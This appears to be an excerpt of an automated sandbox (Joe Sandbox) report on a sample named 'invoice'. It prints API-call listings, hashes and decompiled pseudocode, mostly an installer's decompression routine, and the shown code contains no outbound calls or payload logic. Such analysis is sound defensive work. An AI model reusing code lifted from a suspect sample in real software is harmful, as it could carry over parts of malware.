                                            0x00000000
                                            0x1000200e
                                            0x10001cf5
                                            0x00000000
                                            0x00000000
                                            0x10001cfb
                                            0x10001cfb
                                            0x10001d04
                                            0x10001d09
                                            0x10001d0f
                                            0x00000000
                                            0x00000000
                                            0x10001d15
                                            0x10001d22
                                            0x10001d28
                                            0x10001d32
                                            0x10001d38
                                            0x10001d40
                                            0x10001d50
                                            0x00000000
                                            0x10001d50

                                            APIs
                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                            • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                            • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                            • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                            • GlobalFree.KERNEL32(?), ref: 10001CC4
                                            • GlobalFree.KERNEL32(?), ref: 10001CC9
                                            • GlobalFree.KERNEL32(?), ref: 10001CCE
                                            • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                            • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc
                                            • String ID:
                                            • API String ID: 4227406936-0
                                            • Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                            • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                            • Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                            • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 39%
                                            			E004026F8(char __ebx, char* __edi, char* __esi) {
                                            				void* _t19;
                                            
                                            				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
                                            					E00405EC3(__edi, _t6);
                                            					_push(_t19 - 0x19c);
                                            					_push(__esi);
                                            					E00405F65();
                                            				} else {
                                            					 *__edi = __ebx;
                                            					 *__esi = __ebx;
                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
                                            				return 0;
                                            			}





                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                            • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
                                            • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                            • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E00406742(signed int __ebx, signed int* __esi) {
                                            				signed int _t396;
                                            				signed int _t425;
                                            				signed int _t442;
                                            				signed int _t443;
                                            				signed int* _t446;
                                            				void* _t448;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					_t446 = __esi;
                                            					_t425 = __ebx;
                                            					if( *(_t448 - 0x34) == 0) {
                                            						break;
                                            					}
                                            					L55:
                                            					__eax =  *(__ebp - 0x38);
                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            					__ecx = __ebx;
                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            					__ebx = __ebx + 8;
                                            					while(1) {
                                            						L56:
                                            						if(__ebx < 0xe) {
                                            							goto L0;
                                            						}
                                            						L57:
                                            						__eax =  *(__ebp - 0x40);
                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                            						__ecx = __eax;
                                            						__esi[1] = __eax;
                                            						__ecx = __eax & 0x0000001f;
                                            						if(__cl > 0x1d) {
                                            							L9:
                                            							_t443 = _t442 | 0xffffffff;
                                            							 *_t446 = 0x11;
                                            							L10:
                                            							_t446[0x147] =  *(_t448 - 0x40);
                                            							_t446[0x146] = _t425;
                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                            							L11:
                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                            							E00406EB1( *(_t448 + 8));
                                            							return _t443;
                                            						}
                                            						L58:
                                            						__eax = __eax & 0x000003e0;
                                            						if(__eax > 0x3a0) {
                                            							goto L9;
                                            						}
                                            						L59:
                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                            						__ebx = __ebx - 0xe;
                                            						_t94 =  &(__esi[2]);
                                            						 *_t94 = __esi[2] & 0x00000000;
                                            						 *__esi = 0xc;
                                            						while(1) {
                                            							L60:
                                            							__esi[1] = __esi[1] >> 0xa;
                                            							__eax = (__esi[1] >> 0xa) + 4;
                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                            								goto L68;
                                            							}
                                            							L61:
                                            							while(1) {
                                            								L64:
                                            								if(__ebx >= 3) {
                                            									break;
                                            								}
                                            								L62:
                                            								if( *(__ebp - 0x34) == 0) {
                                            									goto L182;
                                            								}
                                            								L63:
                                            								__eax =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            								__ecx = __ebx;
                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            								__ebx = __ebx + 8;
                                            							}
                                            							L65:
                                            							__ecx = __esi[2];
                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                            							__ebx = __ebx - 3;
                                            							_t108 = __ecx + 0x4083f8; // 0x121110
                                            							__ecx =  *_t108;
                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                            							__ecx = __esi[1];
                                            							__esi[2] = __esi[2] + 1;
                                            							__eax = __esi[2];
                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                            								goto L64;
                                            							}
                                            							L66:
                                            							while(1) {
                                            								L68:
                                            								if(__esi[2] >= 0x13) {
                                            									break;
                                            								}
                                            								L67:
                                            								_t119 = __esi[2] + 0x4083f8; // 0x4000300
                                            								__eax =  *_t119;
                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                            								_t126 =  &(__esi[2]);
                                            								 *_t126 = __esi[2] + 1;
                                            							}
                                            							L69:
                                            							__ecx = __ebp - 8;
                                            							__edi =  &(__esi[0x143]);
                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                            							__eax = 0;
                                            							 *(__ebp - 8) = 0;
                                            							__eax =  &(__esi[3]);
                                            							 *__edi = 7;
                                            							__eax = E00406F19( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                            							if(__eax != 0) {
                                            								L72:
                                            								 *__esi = 0x11;
                                            								while(1) {
                                            									L180:
                                            									_t396 =  *_t446;
                                            									if(_t396 > 0xf) {
                                            										break;
                                            									}
                                            									L1:
                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M00406E71))) {
                                            										case 0:
                                            											L101:
                                            											__eax = __esi[4] & 0x000000ff;
                                            											__esi[3] = __esi[4] & 0x000000ff;
                                            											__eax = __esi[5];
                                            											__esi[2] = __esi[5];
                                            											 *__esi = 1;
                                            											goto L102;
                                            										case 1:
                                            											L102:
                                            											__eax = __esi[3];
                                            											while(1) {
                                            												L105:
                                            												__eflags = __ebx - __eax;
                                            												if(__ebx >= __eax) {
                                            													break;
                                            												}
                                            												L103:
                                            												__eflags =  *(__ebp - 0x34);
                                            												if( *(__ebp - 0x34) == 0) {
                                            													goto L182;
                                            												}
                                            												L104:
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            												__ecx = __ebx;
                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            												__ebx = __ebx + 8;
                                            												__eflags = __ebx;
                                            											}
                                            											L106:
                                            											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                                            											__eax = __eax &  *(__ebp - 0x40);
                                            											__ecx = __esi[2];
                                            											__eax = __esi[2] + __eax * 4;
                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                            											__ecx =  *__eax & 0x000000ff;
                                            											__eflags = __ecx;
                                            											if(__ecx != 0) {
                                            												L108:
                                            												__eflags = __cl & 0x00000010;
                                            												if((__cl & 0x00000010) == 0) {
                                            													L110:
                                            													__eflags = __cl & 0x00000040;
                                            													if((__cl & 0x00000040) == 0) {
                                            														goto L125;
                                            													}
                                            													L111:
                                            													__eflags = __cl & 0x00000020;
                                            													if((__cl & 0x00000020) == 0) {
                                            														goto L9;
                                            													}
                                            													L112:
                                            													 *__esi = 7;
                                            													goto L180;
                                            												}
                                            												L109:
                                            												__esi[2] = __ecx;
                                            												__esi[1] = __eax;
                                            												 *__esi = 2;
                                            												goto L180;
                                            											}
                                            											L107:
                                            											__esi[2] = __eax;
                                            											 *__esi = 6;
                                            											goto L180;
                                            										case 2:
                                            											L113:
                                            											__eax = __esi[2];
                                            											while(1) {
                                            												L116:
                                            												__eflags = __ebx - __eax;
                                            												if(__ebx >= __eax) {
                                            													break;
                                            												}
                                            												L114:
                                            												__eflags =  *(__ebp - 0x34);
                                            												if( *(__ebp - 0x34) == 0) {
                                            													goto L182;
                                            												}
                                            												L115:
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            												__ecx = __ebx;
                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            												__ebx = __ebx + 8;
                                            												__eflags = __ebx;
                                            											}
                                            											L117:
                                            											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                            											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                            											__ecx = __eax;
                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            											__ebx = __ebx - __eax;
                                            											__eflags = __ebx;
                                            											__eax = __esi[4] & 0x000000ff;
                                            											__esi[3] = __esi[4] & 0x000000ff;
                                            											__eax = __esi[6];
                                            											__esi[2] = __esi[6];
                                            											 *__esi = 3;
                                            											goto L118;
                                            										case 3:
                                            											L118:
                                            											__eax = __esi[3];
                                            											while(1) {
                                            												L121:
                                            												__eflags = __ebx - __eax;
                                            												if(__ebx >= __eax) {
                                            													break;
                                            												}
                                            												L119:
                                            												__eflags =  *(__ebp - 0x34);
                                            												if( *(__ebp - 0x34) == 0) {
                                            													goto L182;
                                            												}
                                            												L120:
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            												__ecx = __ebx;
                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            												__ebx = __ebx + 8;
                                            												__eflags = __ebx;
                                            											}
                                            											L122:
                                            											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                                            											__eax = __eax &  *(__ebp - 0x40);
                                            											__ecx = __esi[2];
                                            											__eax = __esi[2] + __eax * 4;
                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                            											__ecx =  *__eax & 0x000000ff;
                                            											__eflags = __cl & 0x00000010;
                                            											if((__cl & 0x00000010) == 0) {
                                            												L124:
                                            												__eflags = __cl & 0x00000040;
                                            												if((__cl & 0x00000040) != 0) {
                                            													goto L9;
                                            												}
                                            												L125:
                                            												__esi[3] = __ecx;
                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                            												__esi[2] = __eax;
                                            												goto L180;
                                            											}
                                            											L123:
                                            											__esi[2] = __ecx;
                                            											__esi[3] = __eax;
                                            											 *__esi = 4;
                                            											goto L180;
                                            										case 4:
                                            											L126:
                                            											__eax = __esi[2];
                                            											while(1) {
                                            												L129:
                                            												__eflags = __ebx - __eax;
                                            												if(__ebx >= __eax) {
                                            													break;
                                            												}
                                            												L127:
                                            												__eflags =  *(__ebp - 0x34);
                                            												if( *(__ebp - 0x34) == 0) {
                                            													goto L182;
                                            												}
                                            												L128:
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            												__ecx = __ebx;
                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            												__ebx = __ebx + 8;
                                            												__eflags = __ebx;
                                            											}
                                            											L130:
                                            											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                            											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                            											__ecx = __eax;
                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            											__ebx = __ebx - __eax;
                                            											__eflags = __ebx;
                                            											 *__esi = 5;
                                            											goto L131;
                                            										case 5:
                                            											L131:
                                            											__eax =  *(__ebp - 0x30);
                                            											__edx = __esi[3];
                                            											__eax = __eax - __esi;
                                            											__ecx = __eax - __esi - 0x1ba0;
                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                            												__ecx = __eax;
                                            												__ecx = __eax - __edx;
                                            												__eflags = __ecx;
                                            											} else {
                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                            											}
                                            											__eflags = __esi[1];
                                            											 *(__ebp - 0x20) = __ecx;
                                            											if(__esi[1] != 0) {
                                            												L135:
                                            												__edi =  *(__ebp - 0x2c);
                                            												do {
                                            													L136:
                                            													__eflags = __edi;
                                            													if(__edi != 0) {
                                            														goto L152;
                                            													}
                                            													L137:
                                            													__edi = __esi[0x26e8];
                                            													__eflags = __eax - __edi;
                                            													if(__eax != __edi) {
                                            														L143:
                                            														__esi[0x26ea] = __eax;
                                            														__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                                            														__eax = __esi[0x26ea];
                                            														__ecx = __esi[0x26e9];
                                            														__eflags = __eax - __ecx;
                                            														 *(__ebp - 0x30) = __eax;
                                            														if(__eax >= __ecx) {
                                            															__edi = __esi[0x26e8];
                                            															__edi = __esi[0x26e8] - __eax;
                                            															__eflags = __edi;
                                            														} else {
                                            															__ecx = __ecx - __eax;
                                            															__edi = __ecx - __eax - 1;
                                            														}
                                            														__edx = __esi[0x26e8];
                                            														__eflags = __eax - __edx;
                                            														 *(__ebp - 8) = __edx;
                                            														if(__eax == __edx) {
                                            															__edx =  &(__esi[0x6e8]);
                                            															__eflags = __ecx - __edx;
                                            															if(__ecx != __edx) {
                                            																__eax = __edx;
                                            																__eflags = __eax - __ecx;
                                            																 *(__ebp - 0x30) = __eax;
                                            																if(__eax >= __ecx) {
                                            																	__edi =  *(__ebp - 8);
                                            																	__edi =  *(__ebp - 8) - __eax;
                                            																	__eflags = __edi;
                                            																} else {
                                            																	__ecx = __ecx - __eax;
                                            																	__edi = __ecx;
                                            																}
                                            															}
                                            														}
                                            														__eflags = __edi;
                                            														if(__edi == 0) {
                                            															goto L183;
                                            														} else {
                                            															goto L152;
                                            														}
                                            													}
                                            													L138:
                                            													__ecx = __esi[0x26e9];
                                            													__edx =  &(__esi[0x6e8]);
                                            													__eflags = __ecx - __edx;
                                            													if(__ecx == __edx) {
                                            														goto L143;
                                            													}
                                            													L139:
                                            													__eax = __edx;
                                            													__eflags = __eax - __ecx;
                                            													if(__eax >= __ecx) {
                                            														__edi = __edi - __eax;
                                            														__eflags = __edi;
                                            													} else {
                                            														__ecx = __ecx - __eax;
                                            														__edi = __ecx;
                                            													}
                                            													__eflags = __edi;
                                            													if(__edi == 0) {
                                            														goto L143;
                                            													}
                                            													L152:
                                            													__ecx =  *(__ebp - 0x20);
                                            													 *__eax =  *__ecx;
                                            													__eax = __eax + 1;
                                            													__ecx = __ecx + 1;
                                            													__edi = __edi - 1;
                                            													__eflags = __ecx - __esi[0x26e8];
                                            													 *(__ebp - 0x30) = __eax;
                                            													 *(__ebp - 0x20) = __ecx;
                                            													 *(__ebp - 0x2c) = __edi;
                                            													if(__ecx == __esi[0x26e8]) {
                                            														__ecx =  &(__esi[0x6e8]);
                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                            													}
                                            													_t357 =  &(__esi[1]);
                                            													 *_t357 = __esi[1] - 1;
                                            													__eflags =  *_t357;
                                            												} while ( *_t357 != 0);
                                            											}
                                            											goto L23;
                                            										case 6:
                                            											L156:
                                            											__eax =  *(__ebp - 0x2c);
                                            											__edi =  *(__ebp - 0x30);
                                            											__eflags = __eax;
                                            											if(__eax != 0) {
                                            												L172:
                                            												__cl = __esi[2];
                                            												 *__edi = __cl;
                                            												__edi = __edi + 1;
                                            												__eax = __eax - 1;
                                            												 *(__ebp - 0x30) = __edi;
                                            												 *(__ebp - 0x2c) = __eax;
                                            												goto L23;
                                            											}
                                            											L157:
                                            											__ecx = __esi[0x26e8];
                                            											__eflags = __edi - __ecx;
                                            											if(__edi != __ecx) {
                                            												L163:
                                            												__esi[0x26ea] = __edi;
                                            												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                                            												__edi = __esi[0x26ea];
                                            												__ecx = __esi[0x26e9];
                                            												__eflags = __edi - __ecx;
                                            												 *(__ebp - 0x30) = __edi;
                                            												if(__edi >= __ecx) {
                                            													__eax = __esi[0x26e8];
                                            													__eax = __esi[0x26e8] - __edi;
                                            													__eflags = __eax;
                                            												} else {
                                            													__ecx = __ecx - __edi;
                                            													__eax = __ecx - __edi - 1;
                                            												}
                                            												__edx = __esi[0x26e8];
                                            												__eflags = __edi - __edx;
                                            												 *(__ebp - 8) = __edx;
                                            												if(__edi == __edx) {
                                            													__edx =  &(__esi[0x6e8]);
                                            													__eflags = __ecx - __edx;
                                            													if(__ecx != __edx) {
                                            														__edi = __edx;
                                            														__eflags = __edi - __ecx;
                                            														 *(__ebp - 0x30) = __edi;
                                            														if(__edi >= __ecx) {
                                            															__eax =  *(__ebp - 8);
                                            															__eax =  *(__ebp - 8) - __edi;
                                            															__eflags = __eax;
                                            														} else {
                                            															__ecx = __ecx - __edi;
                                            															__eax = __ecx;
                                            														}
                                            													}
                                            												}
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													goto L183;
                                            												} else {
                                            													goto L172;
                                            												}
                                            											}
                                            											L158:
                                            											__eax = __esi[0x26e9];
                                            											__edx =  &(__esi[0x6e8]);
                                            											__eflags = __eax - __edx;
                                            											if(__eax == __edx) {
                                            												goto L163;
                                            											}
                                            											L159:
                                            											__edi = __edx;
                                            											__eflags = __edi - __eax;
                                            											if(__edi >= __eax) {
                                            												__ecx = __ecx - __edi;
                                            												__eflags = __ecx;
                                            												__eax = __ecx;
                                            											} else {
                                            												__eax = __eax - __edi;
                                            												__eax = __eax - 1;
                                            											}
                                            											__eflags = __eax;
                                            											if(__eax != 0) {
                                            												goto L172;
                                            											} else {
                                            												goto L163;
                                            											}
                                            										case 7:
                                            											L173:
                                            											__eflags = __ebx - 7;
                                            											if(__ebx > 7) {
                                            												__ebx = __ebx - 8;
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                            												_t380 = __ebp - 0x38;
                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                            												__eflags =  *_t380;
                                            											}
                                            											goto L175;
                                            										case 8:
                                            											L4:
                                            											while(_t425 < 3) {
                                            												if( *(_t448 - 0x34) == 0) {
                                            													goto L182;
                                            												} else {
                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                            													_t425 = _t425 + 8;
                                            													continue;
                                            												}
                                            											}
                                            											_t425 = _t425 - 3;
                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                            											asm("sbb ecx, ecx");
                                            											_t408 = _t406 >> 1;
                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                            											if(_t408 == 0) {
                                            												L24:
                                            												 *_t446 = 9;
                                            												_t436 = _t425 & 0x00000007;
                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                            												_t425 = _t425 - _t436;
                                            												goto L180;
                                            											}
                                            											L6:
                                            											_t411 = _t408 - 1;
                                            											if(_t411 == 0) {
                                            												L13:
                                            												__eflags =  *0x42e388;
                                            												if( *0x42e388 != 0) {
                                            													L22:
                                            													_t412 =  *0x40a40c; // 0x9
                                            													_t446[4] = _t412;
                                            													_t413 =  *0x40a410; // 0x5
                                            													_t446[4] = _t413;
                                            													_t414 =  *0x42d204; // 0x0
                                            													_t446[5] = _t414;
                                            													_t415 =  *0x42d200; // 0x0
                                            													_t446[6] = _t415;
                                            													L23:
                                            													 *_t446 =  *_t446 & 0x00000000;
                                            													goto L180;
                                            												} else {
                                            													_t26 = _t448 - 8;
                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                            													__eflags =  *_t26;
                                            													_t416 = 0x42d208;
                                            													goto L15;
                                            													L20:
                                            													 *_t416 = _t438;
                                            													_t416 = _t416 + 4;
                                            													__eflags = _t416 - 0x42d688;
                                            													if(_t416 < 0x42d688) {
                                            														L15:
                                            														__eflags = _t416 - 0x42d444;
                                            														_t438 = 8;
                                            														if(_t416 > 0x42d444) {
                                            															__eflags = _t416 - 0x42d608;
                                            															if(_t416 >= 0x42d608) {
                                            																__eflags = _t416 - 0x42d668;
                                            																if(_t416 < 0x42d668) {
                                            																	_t438 = 7;
                                            																}
                                            															} else {
                                            																_t438 = 9;
                                            															}
                                            														}
                                            														goto L20;
                                            													} else {
                                            														E00406F19(0x42d208, 0x120, 0x101, 0x40840c, 0x40844c, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
                                            														_push(0x1e);
                                            														_pop(_t440);
                                            														_push(5);
                                            														_pop(_t419);
                                            														memset(0x42d208, _t419, _t440 << 2);
                                            														_t450 = _t450 + 0xc;
                                            														_t442 = 0x42d208 + _t440;
                                            														E00406F19(0x42d208, 0x1e, 0, 0x40848c, 0x4084c8, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
                                            														 *0x42e388 =  *0x42e388 + 1;
                                            														__eflags =  *0x42e388;
                                            														goto L22;
                                            													}
                                            												}
                                            											}
                                            											L7:
                                            											_t423 = _t411 - 1;
                                            											if(_t423 == 0) {
                                            												 *_t446 = 0xb;
                                            												goto L180;
                                            											}
                                            											L8:
                                            											if(_t423 != 1) {
                                            												goto L180;
                                            											}
                                            											goto L9;
                                            										case 9:
                                            											while(1) {
                                            												L27:
                                            												__eflags = __ebx - 0x20;
                                            												if(__ebx >= 0x20) {
                                            													break;
                                            												}
                                            												L25:
                                            												__eflags =  *(__ebp - 0x34);
                                            												if( *(__ebp - 0x34) == 0) {
                                            													goto L182;
                                            												}
                                            												L26:
                                            												__eax =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            												__ecx = __ebx;
                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            												__ebx = __ebx + 8;
                                            												__eflags = __ebx;
                                            											}
                                            											L28:
                                            											__eax =  *(__ebp - 0x40);
                                            											__ebx = 0;
                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                            											 *(__ebp - 0x40) = 0;
                                            											__eflags = __eax;
                                            											__esi[1] = __eax;
                                            											if(__eax == 0) {
                                            												goto L53;
                                            											}
                                            											L29:
                                            											_push(0xa);
                                            											_pop(__eax);
                                            											goto L54;
                                            										case 0xa:
                                            											L30:
                                            											__eflags =  *(__ebp - 0x34);
                                            											if( *(__ebp - 0x34) == 0) {
                                            												goto L182;
                                            											}
                                            											L31:
                                            											__eax =  *(__ebp - 0x2c);
                                            											__eflags = __eax;
                                            											if(__eax != 0) {
                                            												L48:
                                            												__eflags = __eax -  *(__ebp - 0x34);
                                            												if(__eax >=  *(__ebp - 0x34)) {
                                            													__eax =  *(__ebp - 0x34);
                                            												}
                                            												__ecx = __esi[1];
                                            												__eflags = __ecx - __eax;
                                            												__edi = __ecx;
                                            												if(__ecx >= __eax) {
                                            													__edi = __eax;
                                            												}
                                            												__eax = E00405AB9( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                            												_t80 =  &(__esi[1]);
                                            												 *_t80 = __esi[1] - __edi;
                                            												__eflags =  *_t80;
                                            												if( *_t80 == 0) {
                                            													L53:
                                            													__eax = __esi[0x145];
                                            													L54:
                                            													 *__esi = __eax;
                                            												}
                                            												goto L180;
                                            											}
                                            											L32:
